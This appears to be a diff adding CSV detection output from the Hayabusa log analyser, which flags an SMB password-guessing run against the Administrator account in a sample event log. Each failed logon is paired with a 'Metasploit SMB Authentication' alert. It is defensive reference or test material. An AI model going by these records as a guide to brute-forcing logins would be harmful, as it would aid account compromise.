+2016-09-20 01:51:24.235 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BRhH6atcwLcGmrB4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.277 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.324 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BGIInLsy4UCfl0oW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.324 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4qJ7nEN0u9DkVuVH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.372 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.413 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6qb85lEENmrj4ebF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.413 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q6RXAj26rnxMmxuL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.487 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.533 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tas7cqRNGQw6FlVX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.533 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FQlF8GYIeWytFLsJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.597 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Dj48ftx52s1HntRT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.649 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.710 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: B46vTS9PxUgUblBp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.710 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.770 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eoIFbywJEC0QaceV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.770 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PSXqaP0i1eeKQOmX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.817 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.874 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gke4vfzIAC3k0yXU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.874 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.919 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZnjxfeIX4ra6vmBA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.919 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ChR30FLLOT3Pvapv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:24.963 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.006 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VkepVf00vkpVp9yV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.006 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5i2AxYxwCX6DvP3M  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: j8Fvcw2mQBI61mxH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.110 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eAazyOpBig2G3Z78  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: o1g3rjPQQAXEK2yz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.197 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2BC68zrAEF6L00xS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.245 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.294 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8xD2aZArxVdrO6fG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.294 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HHJN2mJgwQEZhXBG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.392 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: untyxmsmYrfRlHcu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.441 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eOc2R5V6p9VBsYI2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.486 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: V5Ld2NDMjbY3tiT7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.547 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ykdbglaCU82nRvk5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.644 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tDGrsVIC5qVEwC6i  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.644 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UouNQa3EkcsMICiO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.686 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: u0exIftdu0qPLrRC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: q5mMNIdJj0BItrv6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pb2cVBffdBlwwGQP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.824 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: p2FbHoSFFdnM4wH7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.852 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RAbCN4xKDDlhmrkU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.917 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pxBwuSDdNZlE2F96  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:25.973 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: M3JkwIQF7yV42rOP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.021 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.062 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6QiHHeHeY8yWOiJg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.062 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.097 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Rhzpo2bEgpJCB51w  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.097 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.145 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AuyPyMMT4wQhLIEz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.145 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.194 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: no5bOZf3SEsrETun  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.194 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vBTHVleOipnyVFIY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JNFE2jNifGI7pELk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.284 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LgkAKJ57rYqCdbew  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.336 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: daKQcllU63lW4ypy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.385 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.426 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GBSPSAoEBS7JRYuf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.426 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 94bI5pb8CGjY3QZD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:26.469 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
